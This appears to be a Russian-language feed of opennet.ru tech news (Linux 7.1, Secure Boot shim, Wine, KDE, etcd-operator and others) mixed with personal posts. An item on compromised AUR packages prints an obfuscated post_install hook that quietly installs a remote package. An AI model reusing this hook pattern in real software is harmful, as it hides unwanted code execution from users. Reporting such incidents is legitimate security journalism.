В среднем пользователи меняют смартфон каждые четыре года, при том, что смена вызвана социальными факторами и желанием получить новую модель, а не выходом из строя или устареванием вычислительных возможностей. Получается, что без дела остаются миллионы устройств с относительно мощными процессорами. Google предлагает давать подобным устройствам вторую жизнь и создавать из них кластеры для облачных вычислений.

Отмечается, что производительность процессорных ядер современных смартфонов при выполнении однопоточных задач сопоставима или превосходит производительность ядер современных серверов. Например, в большинстве проведённых однопоточных тестов SPEC 2017 высокопроизводительные ядра смартфона 2023 Pixel Fold превзошли по производительности (на графике синий) ядра типового сервера ASUS RS720A-E11 (на графике прозрачная рамка) при оценке производительности отдельных процессорных ядер. Ключевое отличие в том, что серверные процессоры оснащены большим числом высокопроизводительных многопоточных ядер, в то время как SoC смартфонов сочетают небольшое число высокопроизводительных и энергоэффективных ядер. С учётом числа ядер вычислительные возможности 25-50 смартфонов рассматриваются как эквивалент современному серверу.

При построении кластера использованы только материнские платы из смартфонов, а вместо Android установлен один из серверных дистрибутивов Linux. Так как смартфоны комплектуются относительно небольшим размером ОЗУ, возможности кластера ограничиваются задачами, для которых достаточно имеющейся в одном устройстве памяти. Для упрощения оркестровки выполнения задач образующие кластер смартфоны разделены на группы по 25–50 устройств, на которых запуск приложений производится в изолированных контейнерах, управляемых через Kubernetes.

Кластер планируют ввести в строй осенью этого года и использовать для сопровождения курсов по параллельным вычислениями и системному программированию. Проведённые эксперименты показали, что кластер из 20 смартфонов выдерживает нагрузку по сопровождению курсов для более чем 75 студентов, обеспечивая задержки ниже, чем у ранее применяемого бэкенда на базе AWS. Предполагается, что кластер из 2000 смартфонов будет способен предоставить вычислительные ресурсы для сопровождения сотен курсов.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65689

I have prepared a directory of sites that work well with #Dillo with a focus on human crafted sites to help new users find useful content:

https://dir.dillo-browser.org/

There is A LOT of content to explore, so be mindful of the time when entering the rabbit hole.

You can also suggest new sites to be added at the end of the page.

В сетевом магазине без интернета нельзя купить товар, который нужно пробивать через qr-код (молоко, сыр, ...) даже за наличку
#сегодня

Релиз ядра Linux 7.1

В новую версию принято 17275 исправлений от 2589 разработчиков, размер патча - 57 МБ (изменения затронули 13528 файлов, добавлено 751785 строк кода, удалено 405916 строк). В прошлом выпуске было 15624 исправлений от 2477 разработчиков, размер патча - 56 МБ. Около 41% всех представленных в 7.1 изменений связаны с драйверами устройств, примерно 12% изменений имеют отношение к обновлению кода, специфичного для аппаратных архитектур, 14% связано с сетевым стеком, 5% - с файловыми системами и 3% c внутренними подсистемами ядра.

Основные новшества в ядре 7.1 (1, 2, 3):

• Дисковая подсистема, ввод/вывод и файловые системы
  • В состав принята новая реализация файловой системы NTFS - ntfsplus, основанная на коде удалённого из ядра классического драйвера ntfs. Старый драйвер был переработан, расширен возможностью записи данных и адаптирован для поддержки современных возможностей, таких как использование фолиантов страниц памяти (folios) вместо структуры buffer_head. В новом драйвере реализовано отложенное выделение блоков, позволившее добиться высокой производительности операций записи и снижения фрагментации. Для буферизированных операций записи/чтения, прямого ввода/вывода, маппинга экстентов и операций страничной записи/чтения задействована библиотека iomap. В тестах iozone драйвер ntfsplus оказался на 3-5% быстрее ntfs3 при записи в однопоточном режиме и на 35-110% при использовании 4 потоков. Скорость чтения ntfsplus и ntfs3 находится примерно на одном уровне. Драйвер ntfs3 остаётся в составе ядра и в него внесены исправления и небольшие улучшения.
  • Добавлена поддержка генерации и верификации данных проверки целостности T10 на уровне файловой системы, а не блочного устройства, что позволяет добиться повышения производительности операций чтения.
  • В драйвер блочных устройств ublk, позволяющий вынести специфичную логику на сторону процесса в пространстве пользователя, добавлена поддержка ввода/вывода через разделяемую память без копирования данных между буферами (режим zero-copy).
  • Для самошифруемых блочных устройств SED-OPAL добавлены ioctl для управления режимом Single User и реализована команда STACK_RESET.
  • В Btrfs объявлена стабильной поддержка ioctl-операции "shutdown", позволяющей перевести ФС в состояние, при котором предпринимается попытка завершения выполнения уже запущенных операций, но блокируются все новые операции.
  • В exfat реализована возможность резервированием пустых областей через вызов fallocate().
  • В ФС CIFS добавлена поддержка создания временных файлов с флагом O_TMPFILE.
  • В системный вызов fsmount() добавлена опция FSMOUNT_NAMESPACE, создающая новое пространство имён точек монитирования для монтируемой файловой системы. В системные вызовы clone3() и unshare() добавлены флаги для возвращения нового пространства имён точек монитирования, содержащего только примонтированную пустую ФС-заглушку на базе nullfs, драйвер fs-dax c ФС-интерфейсом к устройствам DAX (Direct Access).
  • В NFS-сервер добавлена защита от атак по подбору файловых дескрипторов, реализованная через заверение дескрипторов криптографической подписью. Защита включается через опцию монтирования sign_fh.
  • Добавлен символьный драйвер fs-dax, предоставляющий интерфейс для взаимодействия с устройствами DAX (Direct Access), поддерживающими работу в обход страничного кэша. Указанный интерфейс необходим для интеграции в ядро файловой системы famfs, размещаемой в оперативной памяти.
  • В файловой системе Ceph реализован сбор метрик о вводе/выводе в привязке к подразделам.
  • Память и системные сервисы
    • Принята первая серия изменений для прекращения поддержки процессоров i486. Из Kconfig удалены опции для сборки ядра с поддержкой процессоров 486DX, 486SX и AMD ELAN (CONFIG_M486, CONFIG_M486SX и CONFIG_MELAN), а из Makefile исключены опции компиляции для систем i486 (-march=i486). Код для фактической поддержки работы на процессорах i486 пока оставлен в ядре, но сборка для подобных систем теперь потребует применения патчей к сборочным файлам. Причины удаления поддержки процессоров i486 обусловлены желанием избавить ядро от усложнённого кода, эмулирующего некоторые аппаратные операции, такие как CX8 (сравнить и обменять 8 байт) и TSC (счётчик циклов CPU, используемый в планировщике задач).
    • В драйвере amd-pstate, применяемом для управления энергопотреблением на системах с процессорами AMD, реализовано динамическое переключение настроек производительности и изменение поведения управления питанием в зависимости от работы от стационарного питания или аккумулятора. При стационарном подключении теперь активируется режим "performance", а при работе от аккумулятора - "balance_performance".
    • Задействован по умолчанию механизм Intel FRED (Flexible Return and Event Delivery), позволяющий повысить эффективность и надёжность доставки информации о низкоуровневых событиях. Повышение производительности и сокращение задержек обеспечивается благодаря возвращению событий при помощи процессорной инструкции IRET вместо передачи событий через таблицу IDT (Interrupt Descriptor Table). Повышение надёжности достигается благодаря раздельной обработке поступления события в контексте ядра и контексте пользователя, защиты от вложенного выполнения NMI и сохранения в расширенном кадре стека всех связанных с исключением регистров CPU.
    • В подсистему perf добавлена поддержка блоков мониторинга производительности памяти (PMU - Performance Monitoring Unit), используемых в SoC NVIDIA Tegra410.
    • Ускорено выполнение операций futex на системах ARM, благодаря задействованию инструкций Arm 9.6 LSUI, позволяющих ядру обращаться к памяти пространства пользователя без предварительного отключения режима защиты PAN (Privileged Access Never).
    • На системах с процессорами ARM улучшена поддержка расширения архитектуры набора команд MPAM (Memory System Resource Partitioning and Monitoring) и добавлена возможность её использования в пространстве пользователя для управления ресурсами через механизм resctrl. MPAM обеспечивает пометку каждого обращения к памяти идентификатором секции (PARTID, Partition ID) и идентификатором группы мониторинга (PMG, Monitoring Group ID). В привязке к PARTID можно ограничить потребление ресурсов, таких как пропускная способность памяти или размер кэша, что бы какая-то группа задач не заняла все ресурсы. В контексте мониторинга сочетание PMG и PARTID можно использовать для отслеживание потребления ресурсов памяти при определённых видах нагрузки.
    • Добавлена возможность использования режима реального времени (PREEMPT_RT) на 32-разрядных процессорах ARM. Ранее поддержка PREEMPT_RT была обеспечена для архитектур x86 и x86-64, ARM64, RISC-V и LoongArch.
    • В системный вызов clone3() добавлены новые флаги: CLONE_NNP - запрет получения новых привилегий в созданном процессе; CLONE_AUTOREAP - автоматическое завершение процесса вместо его превращения в процесс-зомби до выполнения функции wait() родительским процессом; CLONE_PIDFD_AUTOKILL - завершение дочернего процесса в случае закрытия связанного с ним дескриптора pidfd (например, при завершении родительского процесса).
    • Для каждого модуля ядра в каталог /sys/module добавлен файл import_ns, содержащий список импортированных пространств имён символов (symbol namespace).
    • В систему асинхронного ввода/вывода io_uring добавлена поддержка использования подсистемы BPF для создания обработчиков. Например, можно заменить основной цикл диспетчеризации на BPF-программу.
    • В подсистеме BPF модернизирован анализ использования стека, что значительно ускорило проверку верификатором многих BPF-программ.
    • С целью оптимизации производительности переписана подсистема hrtimer (high resolution timer). Планировщик задач теперь может использовать таймеры с высоким разрешением без потери производительности вместо менее точных таймеров.
    • Продолжен перенос изменений из ветки Rust-for-Linux, связанных с использованием языка Rust в качестве второго языка для разработки драйверов и модулей ядра (поддержка Rust не активна по умолчанию, и не приводит ко включению Rust в число обязательных сборочных зависимостей к ядру). До версии 1.85 (поставляется в Debian 13) повышены требования к версии Rust, необходимой для сборки компонентов ядра. Добавлена экспериментальная Kconfig-опция CONFIG_RUST_INLINE_HELPERS для встраивания Си-прослоек в Rust-код во время компиляции (оптимизация ускорила работу блочного драйвера null на 2%). Добавлен макрос 'const_assert!'. Расширены возможности модулей 'sizes', 'clk', 'ptr', 'sync', 'error'.
    • В механизм SCHED_EXT, позволяющий использовать BPF для создания планировщиков CPU, добавлена начальная возможность создания вложенных планировщиков (sub-scheduler), при помощи которых для каждого cgroup можно задействовать собственный планировщик задач.
    • Продолжена оптимизация подсистемы подкачки (swap). Удалена старая структура swap_map, заменённая на механизм "Swap Table". Изменение позволило повысить производительность и уменьшить потребление памяти в подсистеме подкачки.
    • В подсистему DAMON (Data Access MONitor), позволяющую отслеживать доступ процесса к данным в оперативной памяти (например, можно узнать к каким областям памяти обращался процесс, а какие области памяти остались невостребованными), добавлена поддержка разных алгоритмов автоматического тюнинга квот.
    • В подсистеме трассировки реализована концепция внешних кольцевых буферов, позволяющая получать данные трассировки из виртуальных машин. Возможность задействована в гипервизорах KVM и nVHE для передачи данных трассировки из гостевой системы на сторону хоста.
    • В подсистему RV (Runtime Verification), предназначенную для проверки корректности работы высоконадёжных систем, добавлены компоненты мониторинга "stall" для отслеживания задач, выполнение которых временно приостановлено или заблокировано, и "deadline" для анализа поведения планировщика задач.
    • Виртуализация и безопасность
      • По умолчанию выставлен флаг PROC_MEM_FORCE_PTRACE, допускающий обход прав доступа к памяти процесса через файл /proc/PID/mem только для процессов, применяющих для отладки системный вызов ptrace().
      • Добавлен новый набор hook-ов для LSM-модулей (Linux Security Module), упрощающий реализацию политик для стековых файловых систем, таких как overlayfs. В LSM также добавлен hook для управления доступом к Unix-сокетам, который задействован в LSM-модуле Landlock для назначения политик доступа к Unix-сокетам.
      • Во встроенную криптобиблиотеку lib/crypto, предоставляющую более простые и быстрые функции, чем в традиционном crypto API, добавлена поддержка алгоритмов AES-CMAC, AES-XCBC-MAC, AES-CBC-MAC, GHASH и SM3. Добавлена документация по lib/crypto.
      • Реализован режим pKVM (Protected KVM) для строгой изоляции анонимной памяти с использованием расширений виртуализации для архитектуры AArch64. В данном режиме страницы памяти гостевой исключаются из таблицы виртуальных адресов хостовой системы.
      • В гипервизор KVM добавлена поддержка пятой версии виртуального контроллера прерываний ARM (VGICv5 - ARM Virtual Generic Interrupt Controller v5).
      • Сетевая подсистема
        • Для unix-сокетов, создаваемых функцией socket(), реализована поддержка расширенных атрибутов файлов (xattr) "user.*". Из областей применения отмечается выставление меток через расширенные атрибуты к Unix-сокетам, используемым для IPC Varlink, с целью их выделения из общей массы для инспектирования и отладки работы IPC при помощи BPF-программ. В systemd-journald расширенные атрибуты намерены использовать для определения формата лога в привязке к сокету /dev/log.
        • Удалена поддержка протокола UDP-Lite (RFC 3828), допускающего доставку пакетов с неправильной контрольной суммой с расчётом на то, что, например, частично повреждённые аудио и видеоданные могут быть восстановлены на уровне кодека. Протокол удалён так как им никто не пользуется.
        • Убрана возможность сборки стека IPv6 в форме модуля ядра, которая не применялась на практике (IPv6 либо встраивают в ядро, либо полностью отключают), но усложняла сопровождение так как при сборке IPv6 модулем ядра (CONFIG_IPV6=m), множество подсистем вынуждены добавлять бесполезные обработчики на случай выгрузки модуля IPv6.
        • Оборудование
          • В драйвере AMDGPU включён новый дисплейный движок (DC) для APU AMD серии HD 7000 (Sea Islands, GCN 1.1).
          • В драйвер Nouveau добавлена начальная поддержка GPU NVIDIA GA100 на базе микроархитектуры Ampere.
          • Продолжена работа над drm-драйвером (Direct Rendering Manager) Xe для GPU на базе архитектуры Intel Xe, которая используется в видеокартах Intel семейства Arc и интегрированной графике, начиная с процессоров Tiger Lake. Добавлена поддержка графической подсистемы процессоров Intel Nova Lake-P. Реализованы очищаемые буферные объекты (Purgeable Buffer Objects).
          • Продолжена интеграция компонентов драйвера Nova для GPU NVIDIA, оснащённых GSP-прошивками, используемыми начиная с серии NVIDIA GeForce RTX 2000 на базе микроархитектуры Turing. Драйвер написан на языке Rust. Добавлена начальная поддержка GPU на базе микроархитектуры Turing.
          • Добавлена поддержка звуковых ASoC AMD RPL DMIC, Cirrus Logic CS42L43, CS47L47, NVIDIA CPCAP и WM8962. Улучшена поддержка звуковых устройств с интерфейсом USB: Huawei Headset, Focusrite Novation, MV-Silicon, Studio 1824, Arturia AF16Rig, Hotone Audio, Feaulle Rainbow, PreSonus AudioBox, Moondrop Ju Jiu, Scarlett 18i20.
          • Удалена поддержка применяемых в SoC Baikal-T1 контроллеров AHCI SATA и PCIe, а также драйверов таймера, памяти, physmap, шины, hwmon, dwc и bt1-rom. В качестве причины удаления называется отсутствие сопровождения и незавершённая интеграция в состав ядра компонентов платформы Baikal, производство которой в РФ свернули в ноябре 2025 года.
          • Удавлены 12 драйверов для Ethernet-устройств с интерфейсами ISA и PCMCIA, выпускавшихся до 2002 года, для которых не нашлись пользователи, применяющие их в рабочих системах. Также из ядра исключены подсистема ISDN, реализации протоколов AX.25, CAIF и Bluetooth CMTP (Common ISDN Application Programming Interface Message Transport Protocol), драйверы yellowfin (Yellowfin Gigabit-NIC), hamachi (Hamachi GNIC-II), hamradio (Amateur Radio), inport и logibm (busmouse). Причиной удаления стало отсутствие активных сопровождающих на фоне увеличения числа выявляемых при помощи syzbot и AI-инструментов ошибок, которые никто не берётся исправлять и вся нагрузка нa устранение серьёзных проблем ложится на сопровождающих основные сетевые подсистемы ядра. Всего удалено более 140 тысяч строк кода.
          
          
          Источник: https://www.opennet.ru/opennews/art.shtml?num=65686
          

В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета

   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }

Истекает время жизни сертификата, которым заверен загрузчик для UEFI Secure Boot в дистрибутивах Linux

Существующие системы без установки обновления shim продолжат загрузку до тех пор, пока открытый ключ сертификата не будет удалён из прошивки или не помещён в список отозванных сертификатов UEFI (DBX). Ключом Microsoft заверяется только загрузочная прослойка shim, в которой присутствует публичный ключ дистрибутива, применяемый для заверения загружаемых компонентов, таких как загрузчик GRUB2, ядро Linux, модули ядра и используемые при загрузке процессы, такие как fwupd. Подобный подход позволяет заверять в Microsoft только изменения в прослойке shim и самостоятельно обеспечивать верификацию процесса загрузки дистрибутива.

Сертификат Microsoft для заверения сторонних прошивок для UEFI Secure Boot действует с 2011 года. В 2023 году ему на смену сгенерирован новый сертификат, который стал применяться для формирования подписей с октября 2025 года. В репозиторий Fedora Rawhide, на базе которого формируется релиз Fedora 45, уже добавлен обновлённый shim, заверенный несколькими ключами для обеспечения максимальной совместимости с оборудованием (может использоваться как на старых прошивках без открытого ключа нового сертификата, так и на прошивках без открытого ключа старого сертификата).

Несмотря на то, что истечение срока действия сертификата Microsoft не должно повлиять на работоспособность загрузки, разработчики Fedora рекомендуют пользователям обновить БД c ключами для Secure Boot при появлении новых версий прошивок для их оборудования. Для определения факта загрузки системы в режиме UEFI Secure Boot можно использовать команду "mokutil --sb-state", а для отображения списка имеющихся в прошивке открытых ключей - "mokutil --db --short". Для просмотра ключей, которыми подписана прослойка shim можно запустить команду "sudo pesign -S -i /boot/efi/EFI/fedora/shimx64.efi", предварительно установив пакет pesign. Для проверки наличия обновления прошивки и его установки можно выполнить команду "sudo fwupdmgr update".

Следующая версия прослойки shim будет заверена только новым сертификатом Microsoft и обновление прошивки необходимо для подготовки своих систем к этому изменению. Обновление shim будет выпущено в случае выявления уязвимостей и серьёзных ошибок, что может произойти как через месяц, так и через год. За время существования shim в проекте находили критические уязвимости, при этом последний отчёт о проблемах c безопасностью в shim был выпущен лишь несколько дней назад.

В отчёте отмечены две недавно выявленные уязвимости CVE-2026-8863 и CVE-2026-10797, позволяющие добиться выполнения своего кода на раннем этапе загрузки до передачи управления операционной системе, обойти защиту UEFI Secure Boot и реализовать загрузку незаверенных цифровой подписью компонентов ядра. Проблемы затрагивают версии shim до выпуска 0.9 включительно, сформированные до 2016 года. Атаке подвержены очень старые системы, такие как RedHat Enterprise Linux 7.2, CentOS 7.2, Oracle Linux 7.2, ROSA Linux R10/R9 и openSUSE c shim 0.9. Прослойки shim до версии 0.9 включительно добавлены в базу отозванных цифровых подписей DBX (UEFI Forbidden Signature Database) и в случае обновления DBX в системе не смогут использоваться для загрузки в режиме UEFI Secure Boot.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65683

Сижу у отца дома, он смотрит, простите, мундиаль, вдруг дикторша срывающимся голосом "срочная новость"! Я думаю, ну всё бля приехали. Оказывается, этой новостью был анонс Трампом какой-то очередной сделки с Ираном. И такими срочными новостями они кормят пенсов по десять раз на дню.

Удостоверяющий центр GlobalSign начал отзыв EV-сертификатов у компаний, находящихся под санкциями

Речь ведётся о расширенных TLS-сертификатах уровня EV (Extended Validation), подтверждающих заявленные параметры идентификации и требующих не только проверки владения доменом, но и проведения удостоверяющим центром проверки существования и легального статуса компании, получающей сертификат. В браузерах при работе с сайтами, имеющими EV-сертификаты и сертификаты, полученные только через подтверждение домена, отображается одинаковый значок.

Указано, что во вступившей в силу 4 мая новой версии регламента выдачи EV-сертификатов содержится прямой запрет для удостоверяющих центров выдавать сертификаты компаниям из санкционных списков, а проверка по спискам блокировки стала не рекомендательной, а обязательной.

Данная информация не соответствует действительности, так как упомянутые требования были добавлены CA/Browser Forum в более ранней версии регламента (как минимум прослеживаются в версии от 2022 года). В пункты 3.2.2.12.2 и 4.1.1.1, предписывающие проверку в санкционных списках, в новой версии документа изменения не вносились (версия 2.0.2 от 4 мая 2026 года, версия 2.0.1 от 6 мая 2024 года).

В пункте 4.1.1.1 среди условий прохождения проверки при получении EV-сертификата как минимум с 2022 года упомянуто отсутствие проверяемой компании в списках запрещённых организаций или организаций, подпадающих под эмбарго, в соответствии с законодательством страны, в которой зарегистрирован удостоверяющий центр. В пункте 3.2.2.12.2 указано, что удостоверяющий центр обязан проверить наличие запросившей сертификат организации в списках запрещённых персон и организаций, действующих в стране, в юрисдикции которой находится удостоверяющий центр, а также в странах, в которых удостоверяющий центр осуществляет свою деятельность. Удостоверяющий центр обязан не выдавать EV-сертификат, если запросившая сертификат организация присутствует в подобных списках или если она ведёт деятельность или зарегистрирована в стране, с которой запрещено ведение бизнеса законодательством страны, в которой зарегистрирован удостоверяющий центр.

Компания GlobalSign зарегистрирована в Бельгии и обязана выполнять санкционные ограничения, действующие в Евросоюзе. Помимо индивидуальных санкций, в Евросоюзе также действует введённый в 14-пакете санкций запрет на предоставление корпоративного ПО и оказание IT-услуг российским юридическим лицам. Предполагается, что GlobalSign до сегодняшнего дня не выполнял данные требования, пользуясь введённым в законодательство исключением, позволявшим предоставлять подсанкционным компаниям услуги для обеспечения безопасности всего интернета. Теперь выдача SSL-сертификатов квалифицирована юристами GlobalSign или регулирующими органами как оказание коммерческих IT-услуг, что подпадает под санкционные запреты.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65681

#сегодня ещё немного Пскова

В KDE улучшена поддержка приложений на базе GTK 2 с тёмной темой оформления

Изменения в ветке KDE Plasma 6.8:

• Расширены возможности для определения использования тёмных тем оформления в приложениях на базе GTK 2 и применения к ним тёмных вариантов тем пиктограмм для исключения ситуаций когда в тёмном интерфейсе показываются светлые пиктограммы.
• В компоненты для интеграции с web-браузерами добавлена поддержка Flatpak-пакетов с Microsoft Edge.
• Увеличена верхняя область захвата для перетаскивания не раскрытых на весь экран окон приложений с темой оформления Breeze, по аналогии с тем, как ранее были увеличены области захвата за низ и боковые грани.
• Реализовано отображение уведомления о низком заряде аккумуляторов подключённых устройств даже при запуске программ в полноэкранном режиме, чтобы пользователь не пропустил полный разряд.
• В эффектах "Peek at Desktop" и "Window Aperture" учтены системные настройки скорости анимации.
• Представление информации и формулировки в диалогах предоставления прав доступа через систему порталов XDG (xdg-desktop-portal-kde) унифицированы с другими диалогами KDE.
• В хранителе экрана обеспечен учёт таймаута, заданного в системе через параметры PAM (Pluggable Authentication Modules), без добавления сверх них дополнительных задержек. Добавлен индикатор включения режима для людей с ограниченными возможностями, увеличивающего время удержания клавиш для срабатывания нажатия.
• В KDE Frameworks 6.28 улучшено выравнивание эскизов в диалогах открытия и сохранения файлов, а также разрешено использование по-отдельности клавиши Meta для открытия обзорного режима в KWin.
• В Qt 6.11.2 устранена ошибка, приводившая к аварийному завершению KDE Plasma при загрузке показываемых в виджете Media Player изображений обложек альбомов для контента во внешних сервисах, таких как YouTube.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65679

Новые версии Wine 11.11 и StartWine-Launcher 423

Наиболее важные изменения:

• В драйвер winewayland, позволяющий использовать Wine в окружениях на базе протокола Wayland, добавлена поддержка Wayland-протокола alpha-modifier-v1, позволяющего приложениям менять уровень прозрачности поверхности и выносить операции по обеспечению прозрачности на сторону композитного сервера.
• В winewayland реализована поддержка многослойных окон (WS_EX_LAYERED), компонуемых из нескольких слоёв для реализации эффектов, таких как полупрозрачность и непрямоугольная форма окна (в wine пока реализована только полупрозрачность).
• В winewayland добавлены hints-флаги для задания максимального и минимального размера статичных окон, размер которых не может менять пользователь.
• Вместо криптографической библиотеки TomCrypt в состав включена библиотека SymCrypt, развиваемая компанией Microsoft и поддерживающая алгоритмы постквантового шифрования. Переход на SymCrypt позволил задействовать ассемблерные оптимизации операций шифрования для архитектур x86-64, ARM64, ARM и i386.
• Продолжена работа по размещению в разделяемой памяти структур данных библиотеки user32, связанных с окнами.
• Улучшена совместимость с VBScript.
• В winevulkan осуществлён переход на использование спецификации Vulkan 1.4.353. В wined3d для инициализации поддержки Vulkan задействовано расширение VK_KHR_external_fence_capabilities.
• Решена проблема со скрытием файлов, имя которых начинается с точки, в диалоге открытия файла.
• Устранены регрессии, нарушавшие нормальную работу многопоточных приложений, использующих функцию SendMessage().
• Закрыты отчёты об ошибках, связанные с работой приложений: uTorrent 3.x, Foxit Reader 8.x, Foxit PhantomPDF Business v10.0, winmine.exe, Guitar Pro v8.1.3, Sunlogin, uSimmics, MS-Money 2000.
• Закрыты отчёты об ошибках, связанные с работой игр: Space Empires V, Wreckfest, Battle.Net, Total War: Shogun 2, Spider-Man Remastered, Yesterday Origins, Think or Swim, Gray Matter, Istaria.

Дополнительно можно отметить выпуск приложения Startwine-Launcher 423, развиваемого для запуска в Linux-системах программ и игр, собранных для платформы Windows. Основной целью разработки StartWine-Launcher было упрощение процесса создания новичками префиксов Wine, - наборов библиотек и зависимостей Windows, необходимых для работы Windows-приложений в Linux. Код StartWine-Launcher написан на языке Python и распространяется под лицензией GPLv3. Интерфейс реализован на основе библиотеки GTK.

В новой версии Startwine-Launcher обновлён список версий Wine, а также обновлены префиксные конфигурации, библиотеки и драйверы в контейнере. В utils добавлены библиотеки Steam для совместимости со старыми играми. Исправлены ошибки в скрипте установки, коде обновления установленных данных приложения и во вспомогательных функциях в sw_runlib.



Источник: https://www.opennet.ru/opennews/art.shtml?num=65678

Власти США предписали Anthropic приостановить доступ к AI-моделям Fable 5 и Mythos 5

Поводом для предписания, по предположению Anthropic, послужило обнаружение метода обхода защитных механизмов (jailbreak) модели Fable 5. В Anthropic заявили, что изучили продемонстрированную технику и пришли к выводу, что речь идёт об узком, неуниверсальном обходе, позволяющем выявлять лишь небольшое число ранее известных незначительных уязвимостей, которые могут быть найдены и другими общедоступными моделями, например GPT-5.5, без какого-либо обхода ограничений.

Компания подчинилась юридически обязательной директиве, но не согласна с тем, что обнаружение узкоспециализированного потенциального обхода защиты является основанием для отзыва коммерческой модели, развёрнутой для сотен миллионов пользователей, и считает произошедшее недоразумением, работая над восстановлением доступа.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65677

Проект Cozystack представил переработанный etcd-operator с новым API

Главное изменение в новом etcd-operator - отказ от StatefulSet для управления узлами. Теперь оператор напрямую работает со штатным Membership API etcd (MemberAdd, MemberPromote и MemberRemove) и сам добавляет участников, повышает learner до голосующего узла и выводит узлы из кворума, что даёт оператору полный контроль над составом кластера.

Параллельно разработчики проекта etcd развивают с нуля собственны1 официальный etcd-operator. По функциональности официальный оператор пока уступает etcd-operator от проекта Cozystack. Так как прежняя реализация etcd-operator уже работает в рабочих окружениях и используется в Cozystack и Kamaji, её развитие было продолжено отдельно от официально реализации от проекта etcd.

Развиваемый проектом Cozystack оператор управляет кластерами etcd через два ресурса. EtcdCluster описывает желаемое состояние: число реплик, версию etcd, параметры хранилища, TLS, аутентификацию и настройки etcd. EtcdMember создаётся для каждого узла кластера и владеет его Pod и PVC. В отличие от типовых решений оператор не использует StatefulSet и обслуживает независимо Pod и PVC каждого узла. Состав кластера меняется через API Membership etcd: оператор добавляет новые узлы как learner (MemberAdd), затем повышает их до голосующих участников (MemberPromote). Удаление проходит через MemberRemove, с корректным выводом из кворума. При паузе кластера узлы сохраняют свою идентичность.

Основные возможности:

• развёртывание кластера и масштабирование в обе стороны, по одному узлу за раз: новые узлы стартуют в режиме learner, удаление корректно выводит их из кворума;
• остановка кластера без потери данных (spec.replicas: 0) и возобновление работы с теми же идентификаторами кластера и узлов;
• хранение данных в PVC по умолчанию или в tmpfs, если данные можно восстановить заново; при потере Pod оператор автоматически пересоздаёт узлы с хранилищем в памяти;
• раздельная настройка TLS для клиентских и межузловых соединений: можно подключить свои Secret или поручить оператору выпуск и продление сертификатов через cert-manager;
• аутентификация с единственным пользователем root; его учётные данные задаются через Secret;
• создание снапшотов в S3 или PVC через ресурс EtcdSnapshot и восстановление кластера из снапшота при первом развёртывании;
• автоматический PodDisruptionBudget, который не даёт операциям drain нарушить кворум;
• валидация спецификаций средствами apiserver через CEL-выражения в CRD, без webhook и зависимости от cert-manager;
• подресурс /scale для kubectl scale и VerticalPodAutoscaler, порт метрик 2381, проброс affinity и topologySpreadConstraints;
• плагин kubectl-etcd для повседневных эксплуатационных задач (day-2 operations) после развёртывания кластера.

По сравнению со старой реализацией (v1alpha1) изменилось следующее:

• API-группа сменилась с etcd.aenix.io на etcd-operator.cozystack.io;
• вместо StatefulSet оператор использует отдельный ресурс EtcdMember для каждого узла;
• произвольный словарь spec.options заменён типизированным набором параметров: quota-backend-bytes, режим и интервал автокомпактификации, snapshot-count; свободная map позволяла передавать флаги, которые конфликтовали с логикой оператора;
• ресурс EtcdBackup переименован в EtcdSnapshot, семантика сохранена;
• валидация перенесена с webhook на CEL-правила в CRD;
• сервис кластера переведён в режим headless, чтобы у узлов были стабильные DNS-имена.

Миграция проходит на месте с помощью etcd-migrate. Инструмент адаптирует работающий кластер старого оператора без переноса данных, перезапуска Pod и потери кворума. Он меняет только владельцев объектов, метки и аннотации. После этого новый оператор берёт управление на себя. Клиенты, которые обращаются к кластеру по DNS-имени, продолжают работать без изменений.

Реализация etcd-operator от Cozystack закрывает большинство пунктов плана развития официального etcd-оператора проекта etcd. Статус по пунктам плана:

1. Создание нового кластера etcd, например из 3 или 5 узлов, с указанной версией etcd — реализовано.
2. Определение состояния здоровья кластера — реализовано.
3. Включение TLS-шифрования соединений, включая продление сертификатов — реализовано.
4. Обновление в пределах патч-версий или на одну минорную версию — реализовано частично: значение spec.version применяется только к новым узлам.
5. Масштабирование в обе стороны, например 1 -> 3 -> 5 узлов и обратно — реализовано.
6. Настройка параметров etcd через флаги или переменные окружения — реализовано как закрытый типизированный набор параметров.
7. Восстановление одного отказавшего члена кластера, если кворум сохраняется — реализовано частично: автоматической замены членов с повреждённым PVC пока нет.
8. Восстановление после отказа нескольких членов кластера и потери кворума — не реализовано, работа запланирована.
9. Создание резервной копии кластера по запросу — реализовано.
10. Периодическое резервное копирование кластера — сознательно вынесено за рамки оператора: периодические снапшоты предлагается запускать штатным CronJob.

Кроме того, v1alpha2 даёт возможности, которых нет в плане развития официального оператора:

• остановка кластера до нуля реплик, пауза и возобновление с сохранением идентичности кластера и узлов;
• хранилище в памяти (tmpfs) с автоматической заменой узлов силами оператора;
• валидация на стороне apiserver через CEL, без webhook и зависимости от сертификатов;
• автоматический PodDisruptionBudget для голосующих узлов;
• подресурс /scale с заполненным status.selector, чтобы напрямую работали kubectl scale и VerticalPodAutoscaler.targetRef;
• проброс параметров планирования affinity и topologySpreadConstraints, а также объединение additionalMetadata во всех объектах, которые создаёт оператор;
• инструмент миграции с прежнего оператора без остановки кластера;
• плагин kubectl-etcd для эксплуатационных задач.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65673

Выпуск дистрибутива Proxmox Mail Gateway 9.1

Установочный ISO-образ доступен для свободной загрузки. Специфичные для дистрибутива компоненты открыты под лицензией AGPLv3. Для установки обновлений доступен как платный репозиторий Enterprise, так и два бесплатных репозитория, которые отличаются уровнем стабилизации обновлений. Системная часть дистрибутива базируется на пакетной базе Debian. Возможна установка компонентов Proxmox Mail Gateway поверх уже работающих серверов на базе Debian.

